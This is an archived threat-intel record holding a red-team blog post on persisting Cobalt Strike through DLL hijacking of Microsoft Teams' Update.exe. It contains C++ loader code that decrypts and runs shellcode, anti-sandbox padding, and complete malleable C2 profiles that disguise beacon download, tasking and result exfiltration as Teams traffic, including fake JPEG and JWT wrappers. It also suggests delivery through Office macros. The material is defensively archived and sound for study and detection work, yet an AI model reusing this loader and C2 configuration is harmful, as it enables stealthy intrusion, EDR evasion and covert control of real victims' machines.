{ "id": "a1f34016-7152-4131-909c-c6fdd4a3ebdc", "created_at": "2026-04-06T00:16:38.850671Z", "updated_at": "2026-04-10T13:12:55.661868Z", "deleted_at": null, "sha1_hash": "e1af2b17027d82cbea216389244844fe09357988", "title": "Leveraging Microsoft Teams to cover up Cobalt Strike", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1089161, "plain_text": "Leveraging Microsoft Teams to cover up Cobalt Strike\r\nBy Administrador\r\nPublished: 2021-05-14 · Archived: 2026-04-05 22:56:09 UTC\r\nTable of Contents\r\nIntroduction\r\nCobalt Strike persistence via DLL Hijacking\r\nHiding communications with the C\u0026C\r\nStager: obtaining the Cobalt Strike beacon\r\nBeacon: obtaining tasks\r\nBeacon: sending results\r\nConclusion\r\nIntroduction\r\nDuring a recent Red Team operation got local admin privileges on a workstation where an EDR solution was\r\nidentified. In this scenario, the next step to proceed with the engagement was to infect and persist on the\r\ncompromised system, towards securing remote access. After exploring several options, a Microsoft Teams binary\r\nwas identified as vulnerable to DLL Hijacking.\r\nThis article explains how to take advantage of this situation, making use of a Cobalt Strike payload embedded in\r\na DLL. Finally, it details how to mimic legitimate Microsoft Teams traffic when communicating with the C\u0026C\r\nusing Cobalt Strike malleable C2 profiles.\r\nCobalt Strike persistence via DLL Hijacking\r\nIn order to ease up the process, the Red Team prepared a local environment, as close as possible to the original, to\r\ncarry out the appropriate tests. After that, we used Process Monitor to identify processes trying to load non-existent DLLs. To do so, the following filters were applied:\r\nColumn Relation Value Action\r\nResult is NAME NOT FOUND Include\r\nPath ends with .dll Include\r\nThe process “Update.exe” (32bits) was spotted trying to load “CRYPTSP.dll” from the executable directory,\r\nfailing to do so as this library is located in C:\\Windows\\SysWOW64. This means that if a malicious DLL is placed\r\nin the same directory as the binary, the next time “Update.exe” is started, the process will load this library first and\r\nmake use of some exported functions. \r\nhttps://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/\r\nPage 1 of 8\n\nThis executable was an ideal candidate for the operation for different reasons:\r\nIt is an app update manager (Squirrel), present in multiple products installation (Teams, Slack, Discord,\r\nWebex). In this case, it is part of Microsoft Teams, so it is signed by Microsoft.\r\nIt is executed every time the user opens the application.\r\nThe default installation sets a Run key in the Windows registry so that the application is automatically\r\nlaunched every time the user logged in.\r\nIt is expected to make regular HTTP connections to the Internet, provigind a way to camouflage the\r\ncommunications with a C\u0026C.\r\nVulnerable binary detection\r\nAfter the target has been selected, the Red Team needs to implement a DLL that executes malicious code (in this\r\ncase, a Cobalt Strike payload). To accomplish this, the binary was debugged placing breakpoints on all imported\r\nfunctions to check which of them was being invoked first at “CRYPTSP.dll”.\r\nCryptAcquireContextW() breakpoint\r\nThis showed that CryptAcquireContextW() is the first function being called by “Update.exe”, so the Red Team\r\ndeveloped a library that exports this function with a customized loader that recovers and executes the raw Cobalt\r\nStrike payload (shellcode) from disk. A more transparent alternative would be to create a wrapper using DLL\r\nProxying techniques.\r\nhttps://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/\r\nPage 2 of 8\n\nextern \"C\" {\r\n void __declspec(dllexport) CryptAcquireContextW() {\r\n char payload[PSIZE];\r\n \r\n // Mutex management\r\n HANDLE hMutex = CreateMutex(NULL, FALSE, TEXT(\"WindowsProc\"));\r\n if (hMutex != NULL)\r\n if (GetLastError() == ERROR_ALREADY_EXISTS)\r\n ExitProcess(1);\r\n \r\n // Garbage math operations\r\n stale();\r\n \r\n // Recover payload from file\r\n if(decrypt_shellcode_from_file(payload, PAYLOAD_PATH) == SUCCESS){\r\n \r\n // Launch Teams.exe\r\n execute_Teams();\r\n \r\n // Shellcode execution\r\n HANDLE hFileMap = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0\r\n LPVOID lpMapAddress = MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0,\r\n memcpy((PVOID)lpMapAddress, payload, sizeof(payload));\r\n \r\n __asm\r\n {\r\n mov eax, lpMapAddress\r\n push eax;\r\n ret\r\n }\r\n }\r\n \r\n ReleaseMutex(hMutex);\r\n CloseHandle(hMutex);\r\n }\r\n}\r\nIn this case, the exported function performs the following actions:\r\n1. Use of Mutex to halt execution if the payload is already executed.\r\n2. stale() function call to evade some Machine Learning and Sandboxing checks.\r\n3. Shellcode retrieval and decryption from disk.\r\n4. Teams.exe execution to mimic Update.exe legitimate behaviour.\r\n5. Shellcode execution via CreateFileMapping + MapViewOfFile + memcpy technique.\r\nHiding communications with the C\u0026C\r\nhttps://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/\r\nPage 3 of 8\n\nDue to the restrictions of the environment, in which Internet connectivity was only allowed to Microsoft domains,\r\nDomain Fronting was used alongside customized Cobalt Strike profiles. These settings provide a flexible way of\r\nbuilding the HTTP requests and responses to communicate with the C\u0026C.\r\nThe Red Team used this functionality to hide the agent’s communication, mimicking the HTTP traffic issued by\r\nMicrosoft Teams. In this case, a staged payload was used, which is divided into two parts: the stager and the stage.\r\nThe first, smaller one, is responsible for obtaining the second C\u0026C stage: a DLL containing all the agent’s logic (a\r\nbeacon in Cobalt Strike terms) that is going to be reflectively loaded into memory. By using this type of payload,\r\nthe communication flows with the C\u0026C could be categorized into 3 types:\r\n1. Initial request to get the Cobalt DLL.\r\n2. Implant request to obtain tasks.\r\n3. Implant request to send tasks results.\r\nStager: obtaining the Cobalt Strike beacon\r\nThe http-stager section defines how to retrieve the beacon, where the stager request simulates an image download,\r\nmaking use of Microsoft Teams’ own HTTP headers. The response appears to be a legitimate picture, but contains\r\nthe beacon DLL. In order to achieve this, well-formed JPEG header and trailing bytes are used.\r\nhttp-stager {\r\n set uri_x86 \"/v1/objects/0-neu-d10-ccab474e582c03325f9f07ba8a3aae8a/views/imgo\";\r\n set uri_x64 \"/v1/objects/0-neu-d10-cdab424e592c03253f9f07ba8d9aae8a/views/imgo\";\r\n client {\r\n header \"Host\" \"\u003cEndpoint Azure\u003e\";\r\n header \"x-mx-client-version\" \"27/1.0.0.2021020410\";\r\n header \"Origin\" \"https://teams.microsoft\";\r\n parameter \"v\" \"1\";\r\n }\r\n server {\r\n header \"Server\" \"Microsoft-IIS/10.0\";\r\n header \"strict-transport-security\" \"max-age=31536000; includeSubDomains\";\r\n header \"X-Powered-By\" \"ARR/3.0\";\r\n header \"X-Content-Type-Options\" \"nosniff\";\r\n header \"x-ms-environment\" \"North Europe-prod-3,_cnsVMSS-6_26\";\r\n header \"x-ms-latency\" \"40018.2038\";\r\n header \"Timing-Allow-Origin\" \"https://teams.microsoft.com\";\r\n header \"Access-Control-Allow-Origin\" \"https://teams.microsoft.com\";\r\n header \"Access-Control-Allow-Credentials\" \"true\";\r\n header \"Connection\" \"close\";\r\n header \"Content-Type\" \"image/jpeg\";\r\n output {\r\n prepend \"\\xFF\\xD8\\xFF\\xE0\\x00\\x10\\x4A\\x46\\x49\\x46\\x00\\x01\\x01\\x01\\x00\\x48\\x00\\x48\\x00\\x00\r\nhttps://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/\r\nPage 4 of 8\n\nappend \"\\xF9\\x7C\\xF3\\x4E\\x3F\\xEC\\x7F\\x82\\x8C\\xA4\\xB5\\x5B\\x3E\\x64\\x11\\xE7\\xEA\\x78\\x70\\xCD\\\r\n print;\r\n }\r\n }\r\n}\r\nObtaining the payload\r\nThis way, tools like Wireshark will identify the content of the HTTP response as a JPEG image.\r\nWireshark shows the reply as a JPEG file\r\nBeacon: obtaining tasks\r\nThe following part of the profile is used to define the format of periodic requests in which the Cobalt Strike agent\r\nasks for new tasks to be executed. These requests use the “events” GET parameter to send base64-encoded session\r\ninformation. As we saw before, the information encoded by the server is embedded into responses that appear to\r\nbe legitimate.\r\nhttp-get {\r\n set uri \"/Collector/2.0/settings/\";\r\n client {\r\n header \"Accept\" \"json\";\r\n header \"Host\" \"\u003cEndpoint Azure\u003e\";\r\nhttps://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/\r\nPage 5 of 8\n\nheader \"Referer\" \"https://teams.microsoft.com/_\";\r\n header \"x-ms-session-id\" \"f73c3186-057a-d996-3b63-b6e5de6ef20c\";\r\n header \"x-ms-client-type\" \"desktop\";\r\n header \"x-mx-client-version\" \"27/1.0.0.2021020410\";\r\n header \"Accept-Encoding\" \"gzip, deflate, br\";\r\n header \"Origin\" \"https://teams.microsoft.com\";\r\n \r\n parameter \"qsp\" \"true\";\r\n parameter \"client-id\" \"NO_AUTH\";\r\n parameter \"sdk-version\" \"ACT-Web-JS-2.5.0\u0026\";\r\n \r\n metadata {\r\n base64url;\r\n parameter \"events\";\r\n }\r\n }\r\n server {\r\n header \"Content-Type\" \"application/json; charset=utf-8\";\r\n header \"Server\" \"Microsoft-HTTPAPI/2.0\";\r\n header \"X-Content-Type-Options\" \"nosniff\";\r\n header \"x-ms-environment\" \"North Europe-prod-3,_cnsVMSS-6_26\";\r\n header \"x-ms-latency\" \"40018.2038\";\r\n header \"Access-Control-Allow-Origin\" \"https://teams.microsoft.com\";\r\n header \"Access-Control-Allow-Credentials\" \"true\";\r\n header \"Connection\" \"keep-alive\";\r\n \r\n output {\r\n netbios;\r\n prepend \"{\\\"next\\\":\\\"https://westeurope-prod-3.notifications.teams.microsoft.com/users/8\r\n append \"/events/poll?cursor=1613554385\u0026epfs=srt\u0026sca=4}\";\r\n print;\r\n }\r\n }\r\n}\r\nhttps://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/\r\nPage 6 of 8\n\nSending commands\r\nBeacon: sending results\r\nFinally, the http-post block specifies the format of the result requests sent from the agent to the C\u0026C. For this\r\nexample, the output is inside of the Authentication HTTP header, pretending to be a JWT authentication token.\r\nhttp-post {\r\n set verb \"GET\";\r\n set uri \"/users/8:orgid:b1a28-a1c3-3d54-4eb01adb1/endpoints/events/poll\";\r\n client {\r\n header \"Accept\" \"json\";\r\n header \"Host\" \"\u003cEndpoint Azure\u003e\";\r\n header \"Referer\" \"https://teams.microsoft.com/_\";\r\n header \"x-ms-query-params\" \"cursor=1613554385\u0026epfs=srt\u0026sca=5\u0026activeTimeout=135\";\r\n header \"x-ms-client-type\" \"desktop\";\r\n header \"x-mx-client-version\" \"27/1.0.0.2021020410\";\r\n header \"Accept-Encoding\" \"gzip, deflate, br\";\r\n header \"Origin\" \"https://teams.microsoft\";\r\n output {\r\n base64;\r\n prepend \"skypetoken=eyJhbGciOi\";\r\n header \"Authentication\";\r\n }\r\n id {\r\n netbios;\r\n prepend \"f73c3186-057a-d996-3b63-\";\r\n header \"x-ms-session-id\";\r\n }\r\n }\r\n server {\r\n header \"Content-Type\" \"application/json; charset=utf-8\";\r\n header \"Server\" \"Microsoft-HTTPAPI/2.0\";\r\n header \"X-Content-Type-Options\" \"nosniff\";\r\n header \"x-ms-environment\" \"North Europe-prod-3,_cnsVMSS-6_26\";\r\n header \"x-ms-latency\" \"40018.2038\";\r\n header \"Access-Control-Allow-Origin\" \"https://teams.microsoft.com\";\r\n header \"Access-Control-Allow-Credentials\" \"true\";\r\n header \"Connection\" \"keep-alive\";\r\n \r\n output {\r\n netbios;\r\n prepend \"{\\\"next\\\":\\\"https://westeurope-prod-3.notifications.teams.microsoft.com/users/8\r\nhttps://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/\r\nPage 7 of 8\n\nappend \"/events/poll?cursor=1613554385\u0026epfs=srt\u0026sca=4}\";\r\n print;\r\n }\r\n }\r\n}\r\nSending results\r\nConclusion\r\nThis article shows how an attacker could take advantage of DLL Hijacking vulnerabilities in services to execute\r\nmalicious code through signed binaries, mimicking the traffic of the corresponding legitimate application to\r\nminimize the chances of being detected. It should be noted that this technique can also be useful in social\r\nengineering exercises, in which deploying the malicious DLL through Microsoft Office macros in any application\r\ndirectory that uses this app update manager would be sufficient, without needing to directly inject or execute any\r\npayload.\r\nhttps://www.youtube.com/watch?v=1F6-j6dQtU0\r\nSource: https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/\r\nhttps://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/" ], "report_names": [ "leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434598, "ts_updated_at": 1775826775, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e1af2b17027d82cbea216389244844fe09357988.pdf", "text": "https://archive.orkl.eu/e1af2b17027d82cbea216389244844fe09357988.txt", "img": "https://archive.orkl.eu/e1af2b17027d82cbea216389244844fe09357988.jpg" } }